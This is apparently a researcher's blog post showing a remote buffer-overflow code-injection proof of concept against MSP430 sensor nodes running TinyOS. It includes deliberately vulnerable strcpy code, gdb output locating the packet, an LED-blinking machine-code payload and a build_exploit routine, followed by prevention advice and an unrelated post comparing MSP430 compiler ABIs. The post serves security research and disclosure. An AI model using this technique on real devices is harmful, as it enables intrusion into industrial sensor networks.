Now that we've got machine code and a way to force it onto the stack, we are still left with the issue of knowing at which address it will be. On a workstation, desktop, or server, it's common practice to include NOP instructions before the code you intend to execute, such that you can guess at the target address. On x86 processors, this is particularly easy because of support for a byte-length NOP instruction (0x90) and unaligned access.

Wireless sensor nodes and other embedded systems require a different strategy. The payload of a packet is often so small that a single packet has barely got room for anything interesting, much less a bunch of word-length NOP instructions (0x4303, which is really MOV r3,r3). Fortunately, these systems emphasize static allocation. malloc() and similar usage of a heap is strongly discouraged, to the point that much documentation claims the method doesn't exist.

A consequence of static allocation is that of twenty nodes running the same firmware, twenty nodes will have every non-stack variable in the same location. This includes the functions which handle reception of an incoming packet. Thus, the easiest way to inject code into a live wireless sensor node by a single 802.15.4 packet is to craft a packet which--when copied over the stack--overwrites the return address with the address of the global copy of itself, not the stack's copy.

Executing the stack's copy is also possible, of course.

Target Application

For an example of a remote exploit, I threw together a simple application that accepts the shortened name of a color--RED, GREN, or BLUE--within a packet and enables the appropriate LED. The code is below:


  void __attribute__ ((noinline))
    docmd(radio_count_msg_t* rcm){

    char cmd[6];
    strcpy(cmd,rcm->cmd);


    if(!strcmp(cmd,"RED"))
      call Leds.set(1);
    if(!strcmp(cmd,"GREN"))
      call Leds.set(2);
    if(!strcmp(cmd,"BLUE"))
      call Leds.set(4);
    return;
  }

  event message_t* Receive.receive(message_t* bufPtr,
                                   void* payload, uint8_t len) {
    char cmd[6];
    radio_count_msg_t* rcm = (radio_count_msg_t*)payload;
    docmd(rcm);

    return bufPtr;
  }

The first step is to determine where the packet resides in memory on the victim. I suppose it's possible to dig around TinyOS for the symbol of packet, but when debugging symbols might not be available, a more reliable technique is to search for the contents of the last packet sent:

(gdb) x/s 0x2a2
0x2a2:   "\006RED"
(gdb)

Trying again for a different packet, at the same address I find

(gdb) x/s 0x2a2
0x2a2:   "\006BLUE"
(gdb)

And one last time for the green led, I find

(gdb) x/s 0x2a2
0x2a2:   "\006GREN"
(gdb)

At each stage, the light matches the string being given. This gives me both good and bad news. The good news is that my packet gets through, the bad news is that it's mis-aligned. The "\006" character is at 0x2a2, which means that the packet's string doesn't begin until 0x2a3, which is an odd address. Machine code may only reside at even addresses on the MSP430 and many other processors, with the X86 being a notable exception.

Once the target address is known, crafting an attack is as simple as stuffing the following things into the packet:
1. The executable machine code, even-aligned in the global packet.
2. The entry address off the machine code, even-aligned in the overflow onto the stack, offset such that it overwrites the program counter.
3. A terminating null character or word, such that strcpy() or its equivalent doesn't hit flash ROM.

These rules can be quite a juggling act, but expressed for the above example:
1. Executable code should begin at the second letter of the enclosed string, which will be 0x02a4 on the target.
2. 0x02a4 (0xa4 0x02 as bytes) must reside in bytes 7 and 8 of the string.
3. The string must end in zeros.
4. The first letter must not be a zero.

While it's not terribly difficult to do these things on paper, it's cleaner to do it in C. First we define our machine code in an array, as we did before:


volatile int machlang[30]={
 //garbage;                                                                                                                                                        
 0xdead,
 0xbeef,

 //to be obliterated                                                                                                                                               
 0x0f01,
 0x0f02,

 //to be executed
 0xe3b2, //inv 0x0031                                                                                                                                              
 0x0031,
 0x3ffd, //jmp -4                                                                                                                                                  
 0x0000,
};

This has a lot of empty space and doesn't contain as much information as it might. The machine code in the suffix just blinks the LEDs in an infinite while loop, though in practice they blink faster than the human eye can see. The following code packs the machine code and the target address into a single string for sending as a packet. Note that the address and the machine code are differently aligned. This is because the address must be even aligned with the destination of the strcpy(), while the machine code must be evenly aligned in the source.


void __attribute__ ((noinline))
 build_exploit(void* vstr)
{
 char *str=(char*)vstr;
 //machlang has zeroes, so it may not be used before the address.                                                                                                  
 //load the machine code, with weird but correct offset.                                                                                                           
 memcpy(attack+1,&machlang,16);

 //load the attack address                                                                                                                                         
 memcpy(attack+6,&attackinit,2);

 attack[8]=0;//zero out end, just in case.                                                                                                                         
 memcpy(str,attack,20);
}

Prevention

Randomizing addresses would make these attacks more difficult to stage, particularly if every node ran a different build, such that no two nodes would store incoming packets at the same address. The compiler could also push an object of random size onto the stack such that it would follow a sort of drunkard's walk to prevent stack code from being jumped to.

A still more effective alternative would be an addition to the MSP430 itself, one that would branch to an exception handler if the program counter were ever outside of flash memory. This isn't a workstation, and there's rarely any reason to execute instructions from RAM. Thus, a simple register configuration which enabled and disabled execution from RAM would make the platform much more difficult to exploit.

As always, null-terminated string functions of unspecified length should never be used. There are other mistakes that make the stack vulnerable to corruption, but this is by and large the most common. strcpy() and its like should have been culled from the C language decades ago, but they're still with us and still being taught in introductory computer science classes.

I gave an informal introduction to this technique at the 2007 ACS Control Systems Cyber Security Conference in Knoxville, Tennessee. By far, the most common objections were that cryptography made this un-exploitable in practice or that the fence-line prevented malicious packets from reaching the target system.

Although it's true that cryptographically verifying received packets makes code injection more difficult, it does not make such injection impossible. Key management must have such a strict policy that a stolen node is de-authorized before an attacker can attach a JTAG cable to forcibly grab the key. Further, the JTAG fuse ought to be burned such that the node must be taken off-site for firmware extraction.

Regarding the fence-line, it's just a line in the sand as far as an attacker is concerned. 2.4Ghz amplifiers are rather easy to acquire, and the 150 meter range listed on the radios spec-sheet doesn't apply when an extra amplifier is attached. Even if we assume that the fence-line is effective--such as on a submarine--it's still possible to either bribe or trick an authorized employee into bringing a transmitter within the fence, or a packet sniffer in and then back out.

Kamis, 02 Agustus 2007

On the IAR MSP430 C Compiler's Inefficient Register Utilization

Recently, I've been digging into the documentation of Texas Instruments' MSP430 micro-controller family. After covering the CPU itself, I continued into the documentation[1] for the mspgcc project, a port of GCC to the MSP430. After realizing that the ABI used for mspgcc had never been defined in the chip's documentation[3], I dug up the manual[2] for IAR's compiler and compared the two.

I quickly discovered that IAR's compiler wastes registers when passing 16-bit parameters to a C function. By its ABI, the first 16-bit parameter is placed into R12 and the second into R14. R13 and R15 remain unused, as they are reserved for the high words of 32-bit parameters. GCC follows the much more logical route of only assigning a single register to a 16-bit value, such that R15 is used for the first parameter, R14 for the second, R13 for the third, and R12 for the fourth. This allows it to accept four parameters by register, while IAR's compiler will push the third and fourth onto the stack while leaving two clobber registers unused!

To demonstrate this, I have compiled a simple C program containing only a function foo() which returned the sum of its four inputs and a main() method to call foo(). This was compiled to assembly language using mspgcc 3.2.3 and IAR MSP430 C/C++ Compiler V3.42A/W32.

In both compilers, four assembly instructions were used to add the values and return the result in the single register of the first parameter, R12 for IAR and R15 for GCC. The table below lists the assembly generated by each compiler, with instructions converted from the GCC format (lowercase, .W omitted) to the IAR format for clear comparison. GCC, by virtue of its more efficient register usage, avoids both having to PUSH.W two parameters onto the stack and avoids having to use the indexed addressing mode, as X(SP), within the function.

IAR Compiler	GCC Compiler
foo: ADD.W R14, R12 //1 cycle, 1 word ADD.W 0x2(SP), R12 //3c,2w ADD.W 0x4(SP), R12 //3c,2w RET	foo: ADD.W R14, R15 //1c,1w ADD.W R13, R15 //1c,1w ADD.W R12, R15 //1c,1w RET

Pages 3-72 and 3-73 of the MSP430 Family Guide[3] detail the full cost of these additions, which increase not only the runtime but also the storage requirements of the function. According to those pages, "ADD.W r14,r15" takes 1 cycle and 1 word of memory while "ADD.W 0x2(SP), R12" takes 3 cycles and 2 words of memory. Additionally, each of the two PUSH.W statements required to call foo() in the IAR compiler takes 3 cycles, which are unnecessary in GCC.

Texas Instruments' Code Composer Essentials does not suffer from IAR's inefficiency; rather, it uses an ABI similar to but incompatible with GCC. TICCE allocates register R12 for the first parameter, then R13, R14, and R15. The result is returned in R12. GCC uses registers in the opposite order and returns in R15. See the Users Guide[4] for more details.

What's the reasoning behind IAR's design? It makes functions of two 32-bit values easily compatible with those of two 16-bit values, but this compatibility breaks as soon as the third parameter comes into play, which is pushed onto the stack as a single word. If such compatibility were essential, the trick could be maintained by using R13 for the third parameter and R15 for the fourth.

Sources:
[1] mspgcc manual
[2] IAR manuals
[3] Texas Instruments's MSP430 Family Guide
[4] MSP430 Optimizing C/C++ Compiler User's Guide (SLAU132)